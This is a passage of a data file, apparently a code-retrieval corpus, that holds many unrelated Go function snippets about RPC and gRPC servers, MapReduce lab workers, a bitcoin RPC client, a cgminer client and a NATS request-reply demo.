listenAddress)\n\t}\n\n\t// Start the GRPC server:\n\tif err := grpcServer.Serve(listener); err != nil {\n\t\tlogger.Fatalf(\"Unable to start the GRPC server: %v\", err)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor{\n\t\tgetNext := GetTask(mapf, reducef)\n\t\tif(!getNext){\n\t\t\tbreak\n\t\t}\n\t}\n\t\n}", "func (r *Runner) ServeHTTP(w http.ResponseWriter, req *http.Request) {\n\tr.rpc.ServeHTTP(w, req)\n}", "func main() {\n\tgwMux := runtime.NewServeMux()\n\tendPoint := \"localhost:8081\"\n\topt := []grpc.DialOption{grpc.WithTransportCredentials(helper.GetClientCreds())}\n\t// prod\n\tif err := pbfiles.RegisterProdServiceHandlerFromEndpoint(context.Background(), gwMux, endPoint, opt); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// order\n\tif err := pbfiles.RegisterOrderServiceHandlerFromEndpoint(context.Background(), gwMux, endPoint, opt); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\thttpServer := &http.Server{\n\t\tAddr: \":8080\",\n\t\tHandler: gwMux,\n\t}\n\n\tif err := httpServer.ListenAndServe(); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func bitcoinRPC(arguments *bitcoinArguments, reply *bitcoinReply) error {\n\n\ts, err := json.Marshal(arguments)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalBitcoinData.log.Debugf(\"rpc send: %s\", s)\n\n\tpostData := bytes.NewBuffer(s)\n\n\trequest, err := http.NewRequest(\"POST\", globalBitcoinData.url, postData)\n\tif nil != err {\n\t\treturn err\n\t}\n\trequest.SetBasicAuth(globalBitcoinData.username, globalBitcoinData.password)\n\n\tresponse, err := globalBitcoinData.client.Do(request)\n\tif nil != err {\n\t\treturn err\n\t}\n\tdefer response.Body.Close()\n\tbody, err := ioutil.ReadAll(response.Body)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\terr = json.Unmarshal(body, &reply)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalBitcoinData.log.Debugf(\"rpc receive: %s\", body)\n\n\treturn nil\n}", "func RunRPC() error {\n\tvar servicename = viper.GetString(\"servicename\")\n\tif servicename == \"\" {\n\t\treturn errors.New(\"You must supply a valid servicename for logging using the `servicename` flag\")\n\t}\n\n\tvar rpcPort = viper.GetString(\"rpc-port\")\n\tif rpcPort == \"\" {\n\t\treturn errors.New(\"You must supply a valid port using the 'rpc-port' argument\")\n\t}\n\n\tvar lis, err = net.Listen(\"tcp\", \":\"+rpcPort)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to initialize TCP listen\")\n\t}\n\n\tdefer func() {\n\t\tvar err = lis.Close()\n\t\tif err != nil {\n\t\t\t// log\n\t\t}\n\t}()\n\n\t// Switch on a config file\n\t// switch {}\n\n\tds, err := datastore.New(phdstore.DSConfig{\n\t\tContext: context.Background(),\n\t\tServiceAccountFile: \"/Users/sgg7269/Documents/serviceAccountFiles/ds-serviceaccount.json\",\n\t\tProjectID: \"phdigidev\",\n\t\tNamespace: \"storage_test\",\n\t})\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"handlers.NewGeosearch\")\n\t}\n\n\t// Try to make a new Geosearch before even starting the server\n\ts, err := handlers.New(ds)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"handlers.NewGeosearch\")\n\t}\n\n\tvar rpcServer = grpc.NewServer(\n\t\tgrpc.StatsHandler(&ocgrpc.ServerHandler{\n\t\t\tStartOptions: trace.StartOptions{\n\t\t\t\tSampler: trace.AlwaysSample(),\n\t\t\t},\n\t\t}))\n\n\tpb.RegisterStorageServer(rpcServer, s)\n\n\t// log\n\treturn rpcServer.Serve(lis)\n}", "func main() {\n\n\tconst apiName = \"handle1\"\n\ttStr := `_` + I.ToS(time.Now().UnixNano())\n\tif len(os.Args) > 1 {\n\t\tapp := fiber.New()\n\n\t\tmode := os.Args[1]\n\t\tswitch mode {\n\t\tcase `apiserver`:\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\treturn c.SendString(I.ToS(rand.Int63()) + tStr)\n\t\t\t})\n\n\t\tcase `apiproxy`:\n\t\t\t// connect as request on request-reply\n\n\t\t\tconst N = 8\n\t\t\tcounter := uint32(0)\n\t\t\tncs := [N]*nats.Conn{}\n\t\t\tmutex := sync.Mutex{}\n\t\t\tconn := func() *nats.Conn {\n\t\t\t\tidx := atomic.AddUint32(&counter, 1) % N\n\t\t\t\tnc := ncs[idx]\n\t\t\t\tif nc != nil {\n\t\t\t\t\treturn nc\n\t\t\t\t}\n\t\t\t\tmutex.Lock()\n\t\t\t\tdefer mutex.Unlock()\n\t\t\t\tif ncs[idx] != nil {\n\t\t\t\t\treturn ncs[idx]\n\t\t\t\t}\n\t\t\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\t\t\tL.PanicIf(err, `nats.Connect`)\n\t\t\t\tncs[idx] = nc\n\t\t\t\treturn nc\n\t\t\t}\n\n\t\t\tdefer func() {\n\t\t\t\tfor _, nc := range ncs {\n\t\t\t\t\tif nc != nil {\n\t\t\t\t\t\tnc.Close()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\t// handler\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\tmsg, err := conn().Request(apiName, []byte(I.ToS(rand.Int63())), time.Second)\n\t\t\t\tif L.IsError(err, `nc.Request`) {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\t// Use the response\n\t\t\t\treturn c.SendString(string(msg.Data))\n\t\t\t})\n\t\tdefault:\n\t\t}\n\n\t\tlog.Println(mode + ` started ` + tStr)\n\t\tlog.Fatal(app.Listen(\":3000\"))\n\n\t} else {\n\t\t// worker\n\t\tlog.Println(`worker started ` + tStr)\n\n\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\tL.PanicIf(err, `nats.Connect`)\n\t\tdefer nc.Close()\n\n\t\tconst queueName = `myqueue`\n\n\t\t//// connect as reply on request-reply (sync)\n\t\t//sub, err := nc.QueueSubscribeSync(apiName, queueName)\n\t\t//L.PanicIf(err, `nc.SubscribeSync`)\n\t\t//\n\t\t////Wait for a message\n\t\t//for {\n\t\t//\tmsg, err := sub.NextMsgWithContext(context.Background())\n\t\t//\tL.PanicIf(err, `sub.NextMsgWithContext`)\n\t\t//\n\t\t//\terr = msg.Respond([]byte(string(msg.Data) + tStr))\n\t\t//\tL.PanicIf(err, `msg.Respond`)\n\t\t//}\n\n\t\t//// channel (async) -- error slow consumer\n\t\t//ch := make(chan *nats.Msg, 1)\n\t\t//_, err = nc.ChanQueueSubscribe(apiName, queueName, ch)\n\t\t//L.PanicIf(err, `nc.ChanSubscribe`)\n\t\t//for {\n\t\t//\tselect {\n\t\t//\tcase msg := <-ch:\n\t\t//\t\tL.PanicIf(msg.Respond([]byte(string(msg.Data)+tStr)), `msg.Respond`)\n\t\t//\t}\n\t\t//}\n\n\t\t// callback (async)\n\t\t_, err = nc.QueueSubscribe(apiName, queueName, func(msg *nats.Msg) {\n\t\t\tres := string(msg.Data) + tStr\n\t\t\tL.PanicIf(msg.Respond([]byte(res)), `msg.Respond`)\n\t\t})\n\n\t\tvar line string\n\t\tfmt.Scanln(&line) // wait for input so not exit\n\t}\n}", "func main() {\n\n\thandleRequests()\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\tfor {\n\t\thargs := HandlerArgs{}\n\t\threply := HandlerReply{}\n\n\t\tcall(\"Coordinator.Handler\", &hargs, &hreply)\n\t\t//log.Println(\"hreply\", hreply)\n\t\tif hreply.JobType == \"map\" {\n\n\t\t\tfile, err := os.Open(hreply.MapFile)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot open %v\", hreply.MapFile)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\", hreply.MapFile)\n\t\t\t}\n\t\t\tfile.Close()\n\t\t\tkva := mapf(hreply.MapFile, string(content))\n\n\t\t\ttotal := []*json.Encoder{}\n\n\t\t\tfor i := 0; i < hreply.ReduceNum; i++ {\n\t\t\t\ttmp, err := os.Create(fmt.Sprintf(\"mr-%v-%v.json\", hreply.MapIndex, i))\n\t\t\t\tdefer tmp.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t\tenc := json.NewEncoder(tmp)\n\t\t\t\ttotal = append(total, enc)\n\t\t\t}\n\n\t\t\tfor _, onekva := range kva {\n\t\t\t\tcurr := total[ihash(onekva.Key)%10]\n\t\t\t\tcurr.Encode(&onekva)\n\t\t\t}\n\t\t\tlog.Printf(\"map job mr-%v finished\", hreply.MapIndex)\n\n\t\t\tnargs := NotifyArgs{}\n\t\t\tnreply := NotifyReply{}\n\t\t\tnargs.NotifyType = \"map\"\n\t\t\tnargs.NotifyIndex = hreply.MapIndex\n\n\t\t\tcall(\"Coordinator.Notify\", &nargs, &nreply)\n\n\t\t} else if hreply.JobType == \"reduce\" {\n\n\t\t\tkva := []KeyValue{}\n\t\t\tfor i := 0; i < hreply.MapNum; i++ {\n\t\t\t\ttmp, err := os.Open(fmt.Sprintf(\"mr-%v-%v.json\", i, hreply.ReduceIndex))\n\t\t\t\tdefer tmp.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\n\t\t\t\tdec := json.NewDecoder(tmp)\n\n\t\t\t\tfor {\n\t\t\t\t\tvar kv KeyValue\n\t\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tkva = append(kva, kv)\n\t\t\t\t}\n\t\t\t}\n\t\t\tsort.Sort(ByKey(kva))\n\t\t\toname := fmt.Sprintf(\"mr-out-%v\", hreply.ReduceIndex)\n\t\t\tofile, _ := os.Create(oname)\n\n\t\t\ti := 0\n\t\t\tfor i < len(kva) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t\t// this is the correct format for each line of Reduce output.\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t\tlog.Printf(\"reduce job mr-%v finished\", hreply.ReduceIndex)\n\n\t\t\tnargs := NotifyArgs{}\n\t\t\tnreply := NotifyReply{}\n\t\t\tnargs.NotifyType = \"reduce\"\n\t\t\tnargs.NotifyIndex = hreply.ReduceIndex\n\n\t\t\tcall(\"Coordinator.Notify\", &nargs, &nreply)\n\n\t\t} else if hreply.JobType == \" retry\" {\n\t\t\t//log.Println(\"retry--------------\")\n\t\t} else if hreply.JobType == \"alldone\" {\n\t\t\tos.Exit(0)\n\t\t} else {\n\t\t\t//log.Println(\"sleeping 1 second\")\n\t\t\ttime.Sleep(100 * time.Microsecond)\n\t\t}\n\t}\n\t// uncomment to send the Example RPC to the coordinator.\n\t// CallExample()\n\n}", "func bitcoinRPC(arguments *bitcoinArguments, reply *bitcoinReply) error {\n\n\ts, err := json.Marshal(arguments)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalData.log.Tracef(\"rpc send: %s\", s)\n\n\tpostData := bytes.NewBuffer(s)\n\n\trequest, err := http.NewRequest(\"POST\", globalData.url, postData)\n\tif nil != err {\n\t\treturn err\n\t}\n\trequest.SetBasicAuth(globalData.username, globalData.password)\n\n\tresponse, err := globalData.client.Do(request)\n\tif nil != err {\n\t\treturn err\n\t}\n\tdefer response.Body.Close()\n\tbody, err := ioutil.ReadAll(response.Body)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalData.log.Tracef(\"rpc response body: %s\", body)\n\n\terr = json.Unmarshal(body, &reply)\n\tif nil != err {\n\t\treturn err\n\t}\n\n\tglobalData.log.Debugf(\"rpc receive: %s\", body)\n\n\treturn nil\n}", "func main() {\n initApplicationConfiguration()\n runtime.GOMAXPROCS(2) // in order for the rpc and http servers to work in parallel\n\n go servers.StartRPCServer()\n servers.StartHTTPServer()\n}", "func StartServer(servers []string, me int) *KVPaxos {\n // this call is all that's needed to persuade\n // Go's RPC library to marshall/unmarshall\n // struct Op.\n gob.Register(Op{})\n\n kv := new(KVPaxos)\n kv.me = me\n\n // Your initialization code here.\n kv.data = make(map[string]string)\n kv.pendingRead = make(map[int64]*PendingRead)\n kv.applied = -1\n\n rpcs := rpc.NewServer()\n rpcs.Register(kv)\n\n kv.px = paxos.Make(servers, me, rpcs)\n\n // start worker\n kv.StartBackgroundWorker()\n\n os.Remove(servers[me])\n l, e := net.Listen(\"unix\", servers[me]);\n if e != nil {\n log.Fatal(\"listen error: \", e);\n }\n kv.l = l\n\n // please do not change any of the following code,\n // or do anything to subvert it.\n\n go func() {\n for kv.dead == false {\n conn, err := kv.l.Accept()\n if err == nil && kv.dead == false {\n if kv.unreliable && (rand.Int63() % 1000) < 100 {\n // discard the request.\n conn.Close()\n } else if kv.unreliable && (rand.Int63() % 1000) < 200 {\n // process the request but force discard of reply.\n c1 := conn.(*net.UnixConn)\n f, _ := c1.File()\n err := syscall.Shutdown(int(f.Fd()), syscall.SHUT_WR)\n if err != nil {\n fmt.Printf(\"shutdown: %v\\n\", err)\n }\n go rpcs.ServeConn(conn)\n } else {\n go rpcs.ServeConn(conn)\n }\n } else if err == nil {\n conn.Close()\n }\n if err != nil && kv.dead == false {\n fmt.Printf(\"KVPaxos(%v) accept: %v\\n\", me, err.Error())\n kv.kill()\n }\n }\n }()\n\n return kv\n}", "func Handler(ctx context.Context) (response Response, err error) {\n\n\tres, err := Worker()\n\tif err != nil {\n\t\treturn\n\t}\n\n\tjsonRes, err := json.Marshal(res)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tresponse = Response{\n\t\tStatusCode: 200,\n\t\tIsBase64Encoded: false,\n\t\tBody: string(jsonRes),\n\t\tHeaders: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t},\n\t}\n\n\treturn\n}", "func mainHandler(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tw.Header().Set(\"Access-Control-Allow-Credentials\", \"true\")\n\tw.Header().Set(\"Access-Control-Allow-Headers\", \"Content-Type\")\n\tw.Header().Set(\"Access-Control-Allow-Methods\", \"GET, POST, HEAD\")\n\n\tif r.Method == \"POST\" {\n\t\tvar req dlRequest\n\t\tif err := json.NewDecoder(r.Body).Decode(&req); err != nil {\n\t\t\tlog.Println(err)\n\t\t\thttp.Error(w, \"bad request\", http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t\t// add to queue\n\t\tgo func(qreq *dlRequest) {\n\t\t\tm3u8.DlChan <- &m3u8.WJob{Type: m3u8.ListDL, URL: req.Url, DestPath: req.Path, Filename: req.Filename}\n\t\t}(&req)\n\t\tres := response{req.Url, req.Filename, \"Added to the queue\"}\n\t\tjson.NewEncoder(w).Encode(res)\n\t\treturn\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\tfor {\n\t\ttime.Sleep(time.Second)\n\n\t\treq := GetTaskReq{}\n\t\treq.No = 1\n\t\trsp := GetTaskRsp{}\n\t\tok := call(\"Master.GetTask\", &req, &rsp)\n\t\tif ok {\n\t\t\tfmt.Println(rsp.Status, rsp.TaskID, len(rsp.Filename) > 0)\n\t\t\tif rsp.Status == \"Wait\" {\n\t\t\t\t// do nothing\n\t\t\t} else if rsp.Status == \"Task\" {\n\t\t\t\tdoTask(&req, &rsp, mapf, reducef)\n\t\t\t} else if rsp.Status == \"Exit\" {\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\tfmt.Printf(\"unknow status\\n\")\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Println(\"rpc error\")\n\t\t}\n\n\t}\n\t// uncomment to send the Example RPC to the master.\n\tCallExample()\n\n}", "func main() {\n\tfmt.Println(\"net/rpc Arith server\")\n\tarith := new(nrpc.Arith) // nrpc from import statement // HL\n\trpc.Register(arith)\n\trpc.HandleHTTP()\n\tlis, err := net.Listen(\"tcp\", \":1234\")\n\tif err != nil {\n\t\tlog.Fatalf(\"unable to listen on port 1234: %v\", err)\n\t}\n\n\tgo http.Serve(lis, nil)\n\tselect {} // wait forever\n}", "func rpcClient(name, ip string, refInt int, minerInfo *MinerInformation, wg *sync.WaitGroup, threshold float64) {\n\t//Add everything except the connection\n\tc := Client{name, ip, nil, refInt, minerInfo, nil, threshold, int(time.Now().Unix())}\n\t//Save the Client struct in the MinerInfo\n\tc.MinerInfo.Client = &c\n\n\tclientRequests := make(chan RpcRequest)\n\tc.ClientRequests = clientRequests\n\n\t//Start the thread the will keep doing summary requests\n\tgo SummaryHandler(clientRequests, minerInfo, &c, wg)\n\t//Start another thread the will ask the devs requests\n\tgo DevsHandler(clientRequests, minerInfo, &c, wg)\n\n\t//Wait for new requst to make from the clienReequest channel\n\tfor r := range clientRequests {\n\t\t//Create a new connection\n\t\tc.Conn = createConnection(c.IP)\n\n\t\t//If c.Conn is still nil then we couldn't connect\n\t\t//So send back an empty slice of bytes\n\t\tif c.Conn == nil {\n\t\t\tlog.Printf(\"[rpcClient] - Could not connect to the client - %s\\n\",c.Name)\n\t\t\tr.ResultChan <- make([]byte, 0)\n\n\t\t} else {\n\t\t\t//Send the request to the cgminer\n\t\t\tb := sendCommand(&c.Conn, r.Request)\n\t\t\t/* \n\t\t\t * Note:\n\t\t\t *\n\t\t\t * It seems that cgminer close the tcp connection\n\t\t\t * after each call so we need to reset it for i := 0; i < count; i++ {\n\t\t\t \t\n\t\t\t }\n\t\t\t * the next rpc-call\n\t\t\t */\n\t\t\tc.Conn.Close()\n\n\t\t\t//And send back the result\n\t\t\tr.ResultChan <- b\n\t\t}\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t//Your worker implementation here.\n\tmJobChan := make(chan MRJob)\n\trJobChan := make(chan MRJob)\n\tctx, cancel := context.WithCancel(context.Background()) // used to manage the MR Job\n\targs := MRArgs{\n\t\tStatus: \"INITIAL\",\n\t}\n\n\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\n\tfor {\n\t\tselect {\n\t\tcase mJob := <-mJobChan:\n\t\t\terr := doMap(mapf, mJob)\n\t\t\tif err != nil {\n\t\t\t\targs.Status = \"FAILED\"\n\t\t\t} else {\n\t\t\t\targs.Status = \"FINISHED\"\n\t\t\t}\n\t\t\targs.MId = mJob.JobNum\n\t\t\targs.RId = -1\n\t\t\targs.JobType = \"MAP\"\n\t\t\tlog.Printf(\"MAP: %v, %v request Job\", args.Status, args.MId)\n\t\t\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\t\tcase rJob := <-rJobChan:\n\t\t\terr := doReduce(reducef, rJob)\n\t\t\tif err != nil {\n\t\t\t\targs.Status = \"FAILED\"\n\t\t\t} else {\n\t\t\t\targs.Status = \"FINISHED\"\n\t\t\t}\n\t\t\targs.MId = -1\n\t\t\targs.RId = rJob.JobNum\n\t\t\targs.JobType = \"REDUCE\"\n\t\t\tlog.Printf(\"REDUCE: %v %v, request Job\", args.Status, args.RId)\n\t\t\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\t\tcase <-ctx.Done():\n\t\t\tlog.Println(\"Worker is stopped\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// uncomment to send the Example RPC to the master.\n\t//CallExample()\n}", "func (this *Engine) launchRpcServe() (done chan null.NullStruct) {\n\tvar (\n\t\tprotocolFactory thrift.TProtocolFactory\n\t\tserverTransport thrift.TServerTransport\n\t\ttransportFactory thrift.TTransportFactory\n\t\terr error\n\t\tserverNetwork string\n\t)\n\n\tswitch config.Engine.Rpc.Protocol {\n\tcase \"binary\":\n\t\tprotocolFactory = thrift.NewTBinaryProtocolFactoryDefault()\n\n\tcase \"json\":\n\t\tprotocolFactory = thrift.NewTJSONProtocolFactory()\n\n\tcase \"simplejson\":\n\t\tprotocolFactory = thrift.NewTSimpleJSONProtocolFactory()\n\n\tcase \"compact\":\n\t\tprotocolFactory = thrift.NewTCompactProtocolFactory()\n\n\tdefault:\n\t\tpanic(fmt.Sprintf(\"Unknown protocol: %s\", config.Engine.Rpc.Protocol))\n\t}\n\n\t// client-side Thrift protocol/transport stack must match\n\t// the server-side, otherwise you are very likely to get in trouble\n\tswitch {\n\tcase config.Engine.Rpc.Framed:\n\t\t// each payload is sent over the wire with a frame header containing its size\n\t\ttransportFactory = thrift.NewTFramedTransportFactory(transportFactory)\n\n\tdefault:\n\t\t// there is no BufferedTransport in Java: only FramedTransport\n\t\ttransportFactory = thrift.NewTBufferedTransportFactory(\n\t\t\tconfig.Engine.Rpc.BufferSize)\n\t}\n\n\tswitch {\n\tcase strings.Contains(config.Engine.Rpc.ListenAddr, \"/\"):\n\t\tserverNetwork = \"unix\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = NewTUnixSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = NewTUnixSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\n\tdefault:\n\t\tserverNetwork = \"tcp\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = thrift.NewTServerSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = thrift.NewTServerSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\t}\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// dial zk before startup servants\n\t// because proxy servant is dependent upon zk\n\tif config.Engine.EtcdSelfAddr != \"\" {\n\t\tif err := etclib.Dial(config.Engine.EtcdServers); err != nil {\n\t\t\tpanic(err)\n\t\t} else {\n\t\t\tlog.Debug(\"etcd connected: %+v\", config.Engine.EtcdServers)\n\t\t}\n\t}\n\n\t// when config loaded, create the servants\n\tthis.svt = servant.NewFunServantWrapper(config.Engine.Servants)\n\tthis.rpcProcessor = rpc.NewFunServantProcessor(this.svt)\n\tthis.svt.Start()\n\n\tthis.rpcServer = NewTFunServer(this,\n\t\tconfig.Engine.Rpc.PreforkMode,\n\t\tthis.rpcProcessor,\n\t\tserverTransport, transportFactory, protocolFactory)\n\tlog.Info(\"RPC server ready at %s:%s\", serverNetwork, config.Engine.Rpc.ListenAddr)\n\n\tthis.launchDashboard()\n\n\tdone = make(chan null.NullStruct)\n\tgo func() {\n\t\tif err = this.rpcServer.Serve(); err != nil {\n\t\t\tlog.Error(\"RPC server: %+v\", err)\n\t\t}\n\n\t\tdone <- null.Null\n\t}()\n\n\treturn done\n}", "func (s *Server) call(req *Request) *Response {\n\t// TODO: simplfy this function, or split into several functions\n\tdot := strings.LastIndex(req.Method, \".\") // split req.Method like \"type.Method\"\n\tif dot < 0 {\n\t\terr := errors.New(\"rpc: service/method request ill-formed: \" + req.Method)\n\t\treturn NewResponse(req.ID, nil, NewJsonrpcErr(ParseErr, err.Error(), err))\n\t}\n\n\tserviceName := req.Method[:dot]\n\tmethodName := req.Method[dot+1:]\n\n\t// method existed or not\n\tsvci, ok := s.m.Load(serviceName)\n\tif !ok {\n\t\terr := errors.New(\"rpc: can't find service \" + req.Method)\n\t\treturn NewResponse(req.ID, nil, NewJsonrpcErr(MethodNotFound, err.Error(), nil))\n\t}\n\tsvc := svci.(*service)\n\tmtype := svc.method[methodName]\n\tif mtype == nil {\n\t\terr := errors.New(\"rpc: can't find method \" + req.Method)\n\t\treturn NewResponse(req.ID, nil, NewJsonrpcErr(MethodNotFound, err.Error(), nil))\n\t}\n\n\t// to prepare argv and replyv in reflect.Value\n\t// ref to `net/http/rpc`\n\targIsValue := false // if true, need to indirect before calling.\n\tvar argv reflect.Value\n\tif mtype.ArgType.Kind() == reflect.Ptr {\n\t\targv = reflect.New(mtype.ArgType.Elem())\n\t} else {\n\t\targv = reflect.New(mtype.ArgType)\n\t\targIsValue = true\n\t}\n\n\t// argv guaranteed to be a pointer now.\n\tif argIsValue {\n\t\targv = argv.Elem()\n\t}\n\n\tconvert(req.Params, argv.Interface())\n\t// fmt.Println(argv.Interface())\n\n\treplyv := reflect.New(mtype.ReplyType.Elem())\n\tswitch mtype.ReplyType.Elem().Kind() {\n\tcase reflect.Map:\n\t\treplyv.Elem().Set(reflect.MakeMap(mtype.ReplyType.Elem()))\n\tcase reflect.Slice:\n\t\treplyv.Elem().Set(reflect.MakeSlice(mtype.ReplyType.Elem(), 0, 0))\n\t}\n\n\treturn svc.call(mtype, req, argv, replyv)\n}", "func main() {\n\tHandleRequests( )\n}", "func (conn *Connection) RPCall(funcName string, args interface{}, result interface{}) {\n\tconn.client.Call(funcName, args, result)\n\tconn.wg.Done()\n}", "func (f *Function) fwdRPC(ctx context.Context, reqPayload string) (*hpb.HelloReply, error) {\n\tf.RLock()\n\tdefer f.RUnlock()\n\n\tlogger := log.WithFields(log.Fields{\"fID\": f.fID})\n\n\tfuncClient := *f.funcClient\n\n\tlogger.Debug(\"FwdRPC: Forwarding RPC to function instance\")\n\tresp, err := funcClient.SayHello(ctx, &hpb.HelloRequest{Name: reqPayload})\n\tlogger.Debug(\"FwdRPC: Received a response from the function instance\")\n\n\treturn resp, err\n}", "func init(){\n\tskeleton.RegisterChanRPC(reflect.TypeOf(&msg.Hello{}), handleHello)\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the coordinator.\n\t// CallExample()\n\n\tfor {\n\t\trequestArgs := RequestTaskArgs{}\n\t\trequestReply := RequestTaskReply{}\n\t\tfinishArgs := FinishTaskArgs{}\n\t\tfinishReply := FinishTaskReply{}\n\t\tif !call(\"Coordinator.RequestTask\", &requestArgs, &requestReply) {\n\t\t\tbreak\n\t\t}\n\t\tfinishArgs.Id = requestReply.Id\n\t\tfinishArgs.Type = requestReply.Type\n\t\tif requestReply.Type == Map {\n\t\t\tmapper(&requestReply, mapf)\n\t\t\tcall(\"Coordinator.FinishTask\", &finishArgs, &finishReply)\n\t\t} else if requestReply.Type == Reduce {\n\t\t\treducer(&requestReply, reducef)\n\t\t\tcall(\"Coordinator.FinishTask\", &finishArgs, &finishReply)\n\t\t} else if requestReply.Type == Exit {\n\t\t\tbreak\n\t\t} else {\n\t\t\tlog.Fatalf(\"unknown task type %v\", requestReply.Type)\n\t\t}\n\t}\n}", "func (s *Server) RunRPC(ctx context.Context, wg *sync.WaitGroup) error {\n\twg.Add(1)\n\n\tl, err := net.Listen(\"tcp\", s.GRPCListen)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsrvr := grpc.NewServer()\n\tpb.RegisterRegistryServer(srvr, s)\n\n\t// Shutdown procedure.\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tlog.Println(\"Shutting down gRPC listener\")\n\n\t\tsrvr.GracefulStop()\n\n\t\tif err := l.Close(); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\twg.Done()\n\t}()\n\n\t// Background the listener.\n\tgo func() {\n\t\tlog.Printf(\"gRPC up: %s\\n\", s.GRPCListen)\n\t\tif err := srvr.Serve(l); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t}()\n\n\treturn nil\n}", "func main() {\n handleRequests()\n}", "func listenRPC(app *core.App, config standaloneConfig) error {\n\t// Initialize the JSON RPC WebSocket server (but don't start it yet).\n\trpcAddr := fmt.Sprintf(\":%d\", config.RPCPort)\n\trpcHandler := &rpcHandler{\n\t\tapp: app,\n\t}\n\trpcServer, err := rpc.NewServer(rpcAddr, rpcHandler)\n\tif err != nil {\n\t\treturn nil\n\t}\n\tgo func() {\n\t\t// Wait for the server to start listening and select an address.\n\t\tfor rpcServer.Addr() == nil {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t\tlog.WithField(\"address\", rpcServer.Addr().String()).Info(\"started RPC server\")\n\t}()\n\treturn rpcServer.Listen()\n}", "func main() {\n\texoRelay := helpers.ConnectExoRelay()\n\texoRelay.RegisterHandler(\"ping\", func(request exorelay.Request) {\n\t\terr := request.Reply(\"pong\", nil)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to send reply: %v\", err)\n\t\t}\n\t})\n\texoRelay.RegisterHandler(\"complex ping\", func(request exorelay.Request) {\n\t\tsearchMessage, err := request.Send(\"search\", nil)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to send search: %v\", err)\n\t\t}\n\t\tresultMessage, err := request.WaitForActivity(searchMessage.ActivityID, time.Second*5)\n\t\tif err != nil || resultMessage.Name != \"result\" {\n\t\t\t_, err = request.Send(\"complex ping error\", nil)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Printf(\"Failed to send complex ping error: %v\", err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\terr = request.Reply(\"complex pong\", resultMessage.Payload)\n\t\tif err != nil 